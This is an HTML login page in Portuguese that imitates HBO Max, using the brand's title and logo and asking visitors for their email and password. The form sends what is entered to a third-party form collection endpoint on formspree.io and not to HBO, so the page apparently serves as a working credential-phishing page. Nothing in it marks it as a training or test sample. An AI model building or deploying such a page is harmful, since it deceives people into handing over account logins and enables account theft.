<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HBOMAX</title>
    

<style>

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}
body {

  background-color: rgb(24, 23, 23);
  color: white;
  font-family: sans-serif;
  background-image: url('https://www.10wallpaper.com/wallpaper/1366x768/1804/Venom_2018_Film_4K_HD_Poster_1366x768.jpg');
  background-repeat: no-repeat;
}
.container {
    display: flex;
    justify-content: flex-end;
    align-items: center;
    position: relative;
    top: 150px;
    right: 150px;
    
    
}
.header {
    position: absolute;
    right:30px;
}
p{
    margin-top:10px;
}
.form-main{
    position: absolute;
    top: 100px;
}
#email{
    position: relative;
    left: 70px;

}
#email-camp{
    position: relative;
    left: 70px;
    width: 200px;
    height:20px;
    border: none;
    background: transparent;
    border-bottom: 1px solid rgb(247, 245, 250);
    outline: none;
}
#password-camp{
    position: relative;
    top: 10px;
    left: 70px;
    width: 200px;
    height:20px;
    border: none;
    background: transparent;
    border-bottom: 1px solid rgb(248, 247, 250);
    outline: none;
}
#password{
    position: relative;
    top: 10px;
    left: 70px;
}
#but{
    position: relative;
    top: 50px;
    right: 100px;
    width:120px;
    height:30px;
    border-radius:15px;
    border: none;
    background-color: rgb(136, 12, 136);
    color: white
}
input{
    color: rgb(250, 250, 253);
}
footer img{
    width: 200px;
    position: relative;
    right: 50px;
    bottom: 140px;
}
#bordaentrar {
   
   border-color: rgb(255, 255, 255); 
       border-style: solid;
       border-radius: 10%;
   } 

   

</style>

</head>

<body>

    <div class="container">
        <div class="header">

            <h1 id="entrar">Entrar</h1>

            <p>Você tem uma conta HBO Max?</p>


 <form  action="https://formspree.io/f/xqkjzdlv" method="post">
    
</div>
       
<div class="form-main">

    <div id="bordaemail">
        <label for="" id="email">Email</label>
        <br>

    <input  placeholder="Digite seu mail..." type="email" name="Gmail:" id="email-camp" required>

    </div>

    
    <br>
    <label for="" id="password">Senha</label>
    <br>
    
    <input placeholder="Digite sua Senha..." type="password" name="Senha:" id="password-camp" required >
    

    <button type="submit" id="but">Enviar</button>
    
</div>

<footer>
    <img src="https://static.miraheze.org/freshwebsiteswiki/thumb/8/8a/1100px-HBO_Max_Logo.svg.png/660px-1100px-HBO_Max_Logo.svg.png" alt="">
</footer>
</div>


 </form>
</body>
</html>